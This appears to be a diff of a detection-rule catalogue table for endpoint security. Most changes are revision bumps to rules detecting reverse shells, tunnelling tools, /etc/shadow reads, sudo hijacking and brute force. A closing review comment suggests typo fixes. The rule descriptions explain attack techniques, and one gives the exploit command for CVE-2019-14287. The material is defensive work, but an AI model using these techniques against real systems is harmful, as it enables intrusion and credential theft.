Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-pspy-process-monitoring-detected, Potential Pspy Process Monitoring Detected>> |This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery] |8.3.0 |2 +|<<potential-protocol-tunneling-via-earthworm, Potential Protocol Tunneling via EarthWorm>> |Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-remote-code-execution-via-web-server, Potential Remote Code Execution via Web Server>> |Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. Attackers may exploit a vulnerability in a web application to execute commands via a web server, or place a backdoor file that can be abused to gain code execution as a mechanism for persistence. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-pspy-process-monitoring-detected, Potential Pspy Process Monitoring Detected>> |This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery] |8.3.0 |3 + +|<<potential-remote-code-execution-via-web-server, Potential Remote Code Execution via Web Server>> |Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. Attackers may exploit a vulnerability in a web application to execute commands via a web server, or place a backdoor file that can be abused to gain code execution as a mechanism for persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Initial Access], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |5 |<<potential-remote-credential-access-via-registry, Potential Remote Credential Access via Registry>> |Identifies remote access to the registry to potentially dump credential data from the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 -|<<potential-remote-desktop-shadowing-activity, Potential Remote Desktop Shadowing Activity>> |Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry or the execution of processes indicative of an active RDP shadowing session. An adversary may abuse the RDP Shadowing feature to spy on or control other users active RDP sessions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<potential-remote-desktop-shadowing-activity, Potential Remote Desktop Shadowing Activity>> |Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry or the execution of processes indicative of an active RDP shadowing session. An adversary may abuse the RDP Shadowing feature to spy on or control other users active RDP sessions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 + +|<<potential-remote-desktop-tunneling-detected, Potential Remote Desktop Tunneling Detected>> |Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<potential-remote-desktop-tunneling-detected, Potential Remote Desktop Tunneling Detected>> |Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. 
This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-remote-file-execution-via-msiexec, Potential Remote File Execution via MSIEXEC>> |Identifies the execution of the built-in Windows Installer, msiexec.exe, to install a remote package. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-reverse-shell, Potential Reverse Shell>> |This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-reverse-shell, Potential Reverse Shell>> |This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a parent-child relationship where a network event is followed by the creation of a shell process. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |5 -|<<potential-reverse-shell-activity-via-terminal, Potential Reverse Shell Activity via Terminal>> |Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<potential-reverse-shell-activity-via-terminal, Potential Reverse Shell Activity via Terminal>> |Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<potential-reverse-shell-via-background-process, Potential Reverse Shell via Background Process>> |Monitors for the execution of background processes with process arguments capable of opening a socket in the /dev/tcp channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |1 +|<<potential-reverse-shell-via-background-process, Potential Reverse Shell via Background Process>> |Monitors for the execution of background processes with process arguments capable of opening a socket in the /dev/tcp channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |2 -|<<potential-reverse-shell-via-java, Potential Reverse Shell via Java>> |This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |3 +|<<potential-reverse-shell-via-java, Potential Reverse Shell via Java>> |This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |4 -|<<potential-reverse-shell-via-suspicious-binary, Potential Reverse Shell via Suspicious Binary>> |This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-reverse-shell-via-suspicious-binary, Potential Reverse Shell via Suspicious Binary>> |This detection rule detects the creation of a shell through a chain consisting of the execution of a suspicious binary (located in a commonly abused location or executed manually) followed by a network event and ending with a shell being spawned. Stageless reverse tcp shells display this behaviour. 
Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |5 -|<<potential-reverse-shell-via-suspicious-child-process, Potential Reverse Shell via Suspicious Child Process>> |This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-reverse-shell-via-suspicious-child-process, Potential Reverse Shell via Suspicious Child Process>> |This detection rule detects the creation of a shell through a suspicious process chain. Any reverse shells spawned by the specified utilities that are initialized from a single process followed by a network connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |5 -|<<potential-reverse-shell-via-suspicious-parent-process, Potential Reverse Shell via Suspicious Parent Process>> |This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |4 +|<<potential-reverse-shell-via-udp, Potential Reverse Shell via UDP>> |This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.6.0 |2 -|<<potential-reverse-shell-via-udp, Potential Reverse Shell via UDP>> |This detection rule identifies suspicious network traffic patterns associated with UDP reverse shell activity. This activity consists of a sample of an execve, socket and connect syscall executed by the same process, where the auditd.data.a0-1 indicate a UDP connection, ending with an egress connection event. An attacker may establish a Linux UDP reverse shell to bypass traditional firewall restrictions and gain remote access to a target system covertly. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.6.0 |1 +|<<potential-ssh-it-ssh-worm-downloaded, Potential SSH-IT SSH Worm Downloaded>> |Identifies processes that are capable of downloading files with command line arguments containing URLs to SSH-IT's autonomous SSH worm. This worm intercepts outgoing SSH connections every time a user uses ssh. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Data Source: Elastic Endgame] |8.3.0 |1 -|<<potential-syn-based-network-scan-detected, Potential SYN-Based Network Scan Detected>> |This rule identifies a potential SYN-Based port scan. 
A SYN port scan is a technique employed by attackers to scan a target network for open ports by sending SYN packets to multiple ports and observing the response. Attackers use this method to identify potential entry points or services that may be vulnerable to exploitation, allowing them to launch targeted attacks or gain unauthorized access to the system or network, compromising its security and potentially leading to data breaches or further malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination ports using 2 or less packets per port. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |3 +|<<potential-syn-based-network-scan-detected, Potential SYN-Based Network Scan Detected>> |This rule identifies a potential SYN-Based port scan. A SYN port scan is a technique employed by attackers to scan a target network for open ports by sending SYN packets to multiple ports and observing the response. Attackers use this method to identify potential entry points or services that may be vulnerable to exploitation, allowing them to launch targeted attacks or gain unauthorized access to the system or network, compromising its security and potentially leading to data breaches or further malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination ports using 2 or less packets per port. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring] |8.3.0 |4 -|<<potential-secure-file-deletion-via-sdelete-utility, Potential Secure File Deletion via SDelete Utility>> |Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<potential-secure-file-deletion-via-sdelete-utility, Potential Secure File Deletion via SDelete Utility>> |Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Impact], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 |<<potential-shadow-credentials-added-to-ad-object, Potential Shadow Credentials added to AD Object>> |Identify the modification of the msDS-KeyCredentialLink attribute in an Active Directory Computer or User Object. Attackers can abuse control over the object and create a key pair, append to raw public key in the attribute, and obtain persistent and stealthy access to the target user or computer object. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |106 -|<<potential-shadow-file-read-via-command-line-utilities, Potential Shadow File Read via Command Line Utilities>> |Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.4.0 |106 +|<<potential-shadow-file-read-via-command-line-utilities, Potential Shadow File Read via Command Line Utilities>> |Identifies access to the /etc/shadow file via the commandline using standard system utilities. After elevating privileges to root, threat actors may attempt to read or dump this file in order to gain valid credentials. They may utilize these to move laterally undetected and access additional resources. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.4.0 |107 |<<potential-sharprdp-behavior, Potential SharpRDP Behavior>> |Identifies potential behavior of SharpRDP, which is a tool that can be used to perform authenticated command execution against a remote target via Remote Desktop Protocol (RDP) for the purposes of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |105 -|<<potential-shell-via-wildcard-injection-detected, Potential Shell via Wildcard Injection Detected>> |This rule monitors for the execution of a set of linux binaries, that are potentially vulnerable to wildcard injection, with suspicious command line flags followed by a shell spawn event. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-shell-via-wildcard-injection-detected, Potential Shell via Wildcard Injection Detected>> |This rule monitors for the execution of a set of linux binaries, that are potentially vulnerable to wildcard injection, with suspicious command line flags followed by a shell spawn event. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-successful-linux-ftp-brute-force-attack-detected, Potential Successful Linux FTP Brute Force Attack Detected>> |An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |2 +|<<potential-successful-linux-ftp-brute-force-attack-detected, Potential Successful Linux FTP Brute Force Attack Detected>> |An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |3 -|<<potential-successful-linux-rdp-brute-force-attack-detected, Potential Successful Linux RDP Brute Force Attack Detected>> |An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |2 +|<<potential-successful-linux-rdp-brute-force-attack-detected, Potential Successful Linux RDP Brute Force Attack Detected>> |An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |3 -|<<potential-successful-ssh-brute-force-attack, Potential Successful SSH Brute Force Attack>> |Identifies multiple SSH login failures followed by a successful one from the same source address. Adversaries can attempt to login into multiple users with a common or known password to gain access to accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |7 +|<<potential-successful-ssh-brute-force-attack, Potential Successful SSH Brute Force Attack>> |Identifies multiple SSH login failures followed by a successful one from the same source address. Adversaries can attempt to login into multiple users with a common or known password to gain access to accounts. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access] |8.3.0 |8 -|<<potential-sudo-hijacking-detected, Potential Sudo Hijacking Detected>> |Identifies the creation of a sudo binary located at /usr/bin/sudo. 
Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-sudo-hijacking-detected, Potential Sudo Hijacking Detected>> |Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |103 -|<<potential-sudo-privilege-escalation-via-cve-2019-14287, Potential Sudo Privilege Escalation via CVE-2019-14287>> |This rule monitors for the execution of a suspicious sudo command that is leveraged in CVE-2019-14287 to escalate privileges to root. Sudo does not verify the presence of the designated user ID and proceeds to execute using a user ID that can be chosen arbitrarily. By using the sudo privileges, the command "sudo -u#-1" translates to an ID of 0, representing the root user. This exploit may work for sudo versions prior to v1.28. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Use Case: Vulnerability] |8.3.0 |1 +|<<potential-sudo-privilege-escalation-via-cve-2019-14287, Potential Sudo Privilege Escalation via CVE-2019-14287>> |This rule monitors for the execution of a suspicious sudo command that is leveraged in CVE-2019-14287 to escalate privileges to root. 
Sudo does not verify the presence of the designated user ID and proceeds to execute using a user ID that can be chosen arbitrarily. By using the sudo privileges, the command "sudo -u#-1" translates to an ID of 0, representing the root user. This exploit may work for sudo versions prior to v1.28. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Use Case: Vulnerability] |8.3.0 |2 -|<<potential-sudo-token-manipulation-via-process-injection, Potential Sudo Token Manipulation via Process Injection>> |This rule detects potential sudo token manipulation attacks through process injection by monitoring the use of a debugger (gdb) process followed by a successful uid change event during the execution of the sudo process. A sudo token manipulation attack is performed by injecting into a process that has a valid sudo token, which can then be used by attackers to activate their own sudo token. This attack requires ptrace to be enabled in conjunction with the existence of a living process that has a valid sudo token with the same uid as the current user. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-sudo-token-manipulation-via-process-injection, Potential Sudo Token Manipulation via Process Injection>> |This rule detects potential sudo token manipulation attacks through process injection by monitoring the use of a debugger (gdb) process followed by a successful uid change event during the execution of the sudo process. A sudo token manipulation attack is performed by injecting into a process that has a valid sudo token, which can then be used by attackers to activate their own sudo token. This attack requires ptrace to be enabled in conjunction with the existence of a living process that has a valid sudo token with the same uid as the current user. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |3 |<<potential-suspicious-clipboard-activity-detected, Potential Suspicious Clipboard Activity Detected>> |This rule monitors for the usage of the most common clipboard utilities on unix systems by an uncommon process group leader. Adversaries may collect data stored in the clipboard from users copying information within or between applications. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Collection], [Rule Type: BBR], [Data Source: Elastic Defend] |8.6.0 |2 -|<<potential-suspicious-debugfs-root-device-access, Potential Suspicious DebugFS Root Device Access>> |This rule monitors for the usage of the built-in Linux DebugFS utility to access a disk device without root permissions. Linux users that are part of the "disk" group have sufficient privileges to access all data inside of the machine through DebugFS. Attackers may leverage DebugFS in conjunction with "disk" permissions to read sensitive files owned by root, such as the shadow file, root ssh private keys or other sensitive files that may allow them to further escalate privileges. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-suspicious-debugfs-root-device-access, Potential Suspicious DebugFS Root Device Access>> |This rule monitors for the usage of the built-in Linux DebugFS utility to access a disk device without root permissions. Linux users that are part of the "disk" group have sufficient privileges to access all data inside of the machine through DebugFS. Attackers may leverage DebugFS in conjunction with "disk" permissions to read sensitive files owned by root, such as the shadow file, root ssh private keys or other sensitive files that may allow them to further escalate privileges. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 + +|<<potential-suspicious-file-edit, Potential Suspicious File Edit>> |This rule monitors for the potential edit of a suspicious file. In Linux, when editing a file through an editor, a temporary .swp file is created. By monitoring for the creation of this .swp file, we can detect potential file edits of suspicious files. The execution of this rule is not a clear sign of the file being edited, as just opening the file through an editor will trigger this event. Attackers may alter any of the files added in this rule to establish persistence, escalate privileges or perform reconnaisance on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-suspicious-file-edit, Potential Suspicious File Edit>> |This rule monitors for the potential edit of a suspicious file. In Linux, when editing a file through an editor, a temporary .swp file is created. By monitoring for the creation of this .swp file, we can detect potential file edits of suspicious files. The execution of this rule is not a clear sign of the file being edited, as just opening the file through an editor will trigger this event. Attackers may alter any of the files added in this rule to establish persistence, escalate privileges or perform reconnaisance on the system. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-unauthorized-access-via-wildcard-injection-detected, Potential Unauthorized Access via Wildcard Injection Detected>> |This rule monitors for the execution of the "chown" and "chmod" commands with command line flags that could indicate a wildcard injection attack. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 -|<<potential-unauthorized-access-via-wildcard-injection-detected, Potential Unauthorized Access via Wildcard Injection Detected>> |This rule monitors for the execution of the "chown" and "chmod" commands with command line flags that could indicate a wildcard injection attack. Linux wildcard injection is a type of security vulnerability where attackers manipulate commands or input containing wildcards (e.g., *, ?, []) to execute unintended operations or access sensitive data by tricking the system into interpreting the wildcard characters in unexpected ways. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |2 +|<<potential-upgrade-of-non-interactive-shell, Potential Upgrade of Non-interactive Shell>> |Identifies when a non-interactive terminal (tty) is being upgraded to a fully interactive shell. 
Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host, in order to obtain a more stable connection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |1 -|<<potential-windows-error-manager-masquerading, Potential Windows Error Manager Masquerading>> |Identifies suspicious instances of the Windows Error Reporting process (WerFault.exe or Wermgr.exe) with matching command-line and process executable values performing outgoing network connections. This may be indicative of a masquerading attempt to evade suspicious child process behavior detections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |105 +|<<potential-windows-error-manager-masquerading, Potential Windows Error Manager Masquerading>> |Identifies suspicious instances of the Windows Error Reporting process (WerFault.exe or Wermgr.exe) with matching command-line and process executable values performing outgoing network connections. This may be indicative of a masquerading attempt to evade suspicious child process behavior detections. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 -|<<potential-curl-cve-2023-38545-exploitation, Potential curl CVE-2023-38545 Exploitation>> |Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. 
For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |1 +|<<potential-curl-cve-2023-38545-exploitation, Potential curl CVE-2023-38545 Exploitation>> |Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Use Case: Vulnerability], [Tactic: Execution], [Data Source: Elastic Defend] |8.6.0 |2 |<<potential-macos-ssh-brute-force-detected, Potential macOS SSH Brute Force Detected>> |Identifies a high number (20) of macOS SSH KeyGen process executions from the same host. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |105 
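Review bot: The regenerated "Potential Suspicious File Edit" row (version 3) still carries the misspelling "reconnaisance" from the version 2 row it replaces; since the row is being rewritten anyway, correct it to "reconnaissance" in the rule's description so the generated table picks it up, and the same fix will then apply to the description's odd phrasing "The execution of this rule is not a clear sign of the file being edited", which would read more accurately as "An alert from this rule is not a clear sign that the file was edited".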
